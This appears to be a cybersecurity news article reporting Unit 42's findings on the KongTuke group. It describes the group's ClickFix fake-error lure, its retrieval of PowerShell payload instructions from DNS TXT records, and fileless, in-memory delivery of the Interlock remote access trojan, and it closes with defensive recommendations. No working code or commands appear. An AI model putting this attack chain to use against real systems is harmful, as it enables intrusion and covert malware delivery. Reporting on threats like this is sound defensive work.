The cybersecurity world is witnessing a troubling trend as threat actors refine their techniques to evade traditional security measures. The KongTuke group, active since mid-2025, is at the forefront of this evolution, employing sophisticated strategies to breach enterprise defenses.
New Tactics in the KongTuke Campaign
KongTuke remains notorious for its ‘ClickFix’ method, a social engineering ploy that tricks users into resolving fabricated web issues. Victims are often presented with fake browser errors or verification prompts on compromised sites. The deception involves users copying a harmful script into the Windows Run dialog or a PowerShell terminal, inadvertently sidestepping automated security protocols.
Recently, KongTuke’s tactics have advanced, as revealed by Unit 42 analysts. The group now utilizes DNS TXT records to clandestinely carry out their operations. This shift from HTTP-based communication to DNS queries complicates detection efforts for security teams, as malicious traffic is masked within the regular DNS activity.
Understanding DNS TXT Record Exploitation
The innovation in KongTuke’s approach lies in how they retrieve malicious payloads. Instead of a direct file download, the initial ClickFix script activates a PowerShell command to perform a DNS lookup for a specific TXT record. These records, typically for domain verification, now contain the instructions for downloading and executing the final payload.
This technique exploits the generally unrestricted nature of DNS traffic, creating a critical vulnerability. The script extracts and executes the command from the DNS response in memory, a method known as ‘fileless’ execution, which minimizes detectable traces on the system.
Implications and Defensive Strategies
The ultimate aim of KongTuke’s advanced attacks is the deployment of severe malware, such as the Interlock remote access trojan, establishing persistent threats within networks. The reliance on DNS TXT records poses a significant challenge for defenders who primarily monitor HTTP traffic.
To counter these sophisticated tactics, experts recommend blocking newly registered domains, scrutinizing DNS traffic for irregularities, and rigorously monitoring PowerShell execution logs for anomalous DNS queries. Such measures are crucial in mitigating the risks posed by these evolving cyber threats.
Stay informed on the latest developments in cybersecurity by following us on Google News, LinkedIn, and X. Set CSN as your preferred information source on Google to receive instant updates.
